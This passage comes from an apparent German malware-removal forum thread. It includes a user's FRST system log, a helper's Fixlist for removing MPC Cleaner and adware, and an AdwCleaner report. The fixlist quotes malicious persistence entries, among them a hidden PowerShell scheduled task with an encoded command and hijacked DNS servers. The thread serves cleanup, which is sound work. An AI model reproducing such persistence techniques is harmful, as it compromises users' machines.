Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f, ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f, ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll 2016-03-21 22:40 - 2016-03-21 22:40 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll 2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll 2013-10-31 18:49 - 2014-03-13 16:52 - 
01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll 2013-06-29 02:51 - 2013-02-20 22:58 - 00111176 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll 2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. 
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKLM\...\StartupApproved\Run: => "ETDCtrl" HKLM\...\StartupApproved\Run: => "Samsung Link" HKLM\...\StartupApproved\Run: => "3D BubbleSound" HKLM\...\StartupApproved\Run: => "SpaceSoundPro" HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud" HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2" HKLM\...\StartupApproved\Run32: => "QuickTime Task" HKLM\...\StartupApproved\Run32: => "Registry Helper" HKLM\...\StartupApproved\Run32: => "fst_de_19" HKLM\...\StartupApproved\Run32: => "t4pc_en_3" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126" HKLM\...\StartupApproved\Run32: => "YTDownloader" HKLM\...\StartupApproved\Run32: => " QQPCTray" HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk" HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk" HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless" HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "Web Companion" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743 FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643 FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676 FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679 FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234 FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900 FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900 FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray 
Agent.exe FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe FirewallRules: 
[{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung 
Link.exe FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe ==================== Wiederherstellungspunkte ========================= 22-03-2016 02:55:07 JRT Pre-Junkware Removal 29-03-2016 12:45:27 Windows Modules Installer ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: 
(03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Error: (03/29/2016 12:47:05 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2 Systemfehler: ============= Error: (03/28/2016 11:05:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Euseuchoul" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. 
Error: (03/28/2016 10:55:02 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT) Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (03/28/2016 10:54:43 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT) Description: {DDCFD26B-FEED-44CD-B71D-79487D2E5E5A} Error: (03/28/2016 10:52:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Fuelf" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (03/28/2016 10:52:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Arygnarj" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (03/22/2016 03:12:52 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT) Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x8007045b fehlgeschlagen: Update für Windows 8.1 für x64-Systeme (KB3121255) Error: (03/22/2016 02:09:04 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Fuelf" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (03/22/2016 02:09:00 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Arygnarj" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (03/22/2016 02:08:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: %%1062 Error: (03/22/2016 02:07:42 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. 
Fehler: %%1056 CodeIntegrity: =================================== Date: 2016-01-27 20:34:50.024 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:33:27.259 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:32.120 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:31.842 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:21.532 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:21.366 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:19.557 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. 
Date: 2016-01-27 20:31:13.438 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:00.333 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. Date: 2016-01-27 20:31:00.166 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz Prozentuale Nutzung des RAM: 41% Installierter physikalischer RAM: 3971.27 MB Verfügbarer physikalischer RAM: 2310.89 MB Summe virtueller Speicher: 8067.27 MB Verfügbarer virtueller Speicher: 6050.91 MB ==================== Laufwerke ================================ Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:393.05 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D) Partition: GPT. ==================== Ende von Addition.txt ============================ |
29.03.2016, 12:49 | #5 |
/// Malwareteam | MPC Cleaner cannot be removed (malware)
Step 1: Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document.
Code:
closeprocesses:
HKLM-x32\...\Run: [sun13] => [X]
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer: [CDRAutoRun] 1
HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
removeproxy:
Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149
Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70
Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07]
FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19]
FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden
S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\FeykfeCekd
S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X]
C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D C:\WINDOWS\system32\diee
2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo
2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef
2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha
2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua
2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D C:\WINDOWS\system32\wof
2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf
emptytemp:
Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat
Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen).
Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat
C:\PROGRA~1\SHOPPE~1
C:\PROGRA~1\SHOPPE~2
C:\PROGRA~1\SHOPPE~3
C:\PROGRA~1\GROOVE~1
C:\Users\Denny\AppData\Roaming\yoursearching
Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat
Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => C:\PROGRA~1\GROOVE~1\Itiulgac.bat
Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat
Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat
FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743
FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643
FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676
FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679
FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234
FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900
FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900
cmd: dir %appdata% /a d
cmd: dir "C:\Program Files" /a d

Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
Step 2: Please download Malwarebytes Anti-Malware
Step 3: Please download AdwCleaner to your desktop.
Step 4: Please start FRST again, tick the Addition box and click Scan. Please post the two text files that this produces again. So in your next reply, please post:
__________________ Best regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Last edited by burningice (29.03.2016 at 12:59) |
29.03.2016, 18:14 | #6 |
| MPC Cleaner cannot be deleted (malware) AdwCleaner Code:
# AdwCleaner v5.107 - Bericht erstellt am 29/03/2016 um 18:39:37
# Aktualisiert am 28/03/2016 von Xplode
# Datenbank : 2016-03-28.2 [Server]
# Betriebssystem : Windows 8.1 (x64)
# Benutzername : Denny - SCHNEIDER
# Gestartet von : C:\Users\Denny\Desktop\AdwCleaner_5.107.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

[-] Dienst Gelöscht : MPCProtectService
[-] Dienst Gelöscht : MPCKpt

***** [ Ordner ] *****

[#] Ordner Gelöscht : C:\Program Files (x86)\MPC Cleaner
[-] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\torch

***** [ Dateien ] *****

***** [ DLLs ] *****

***** [ Verknüpfungen ] *****

***** [ Aufgabenplanung ] *****

***** [ Registrierungsdatenbank ] *****

[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\DriverRestore.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Schlüssel Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\DataMngr_Toolbar
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www-mysearch.com
